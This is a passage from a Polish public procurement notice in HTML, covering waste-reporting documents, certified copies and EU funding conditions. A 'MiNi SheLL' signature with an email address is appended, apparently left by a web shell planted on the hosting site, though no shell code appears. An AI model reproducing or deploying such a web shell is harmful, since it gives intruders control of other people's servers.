                         rocznie odpadów innych niż niebezpieczne - informację o wytwarzanych odpadach oraz o 
                         sposobie gospodarowania odpadami.
3.	Dokumenty wymienione w pkt. 1.1. - 1.3. i pkt. 2 niniejszego rozdziału  mogą być złożone w formie kserokopii potwierdzonej za zgodność z oryginałem przez Wykonawcę..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com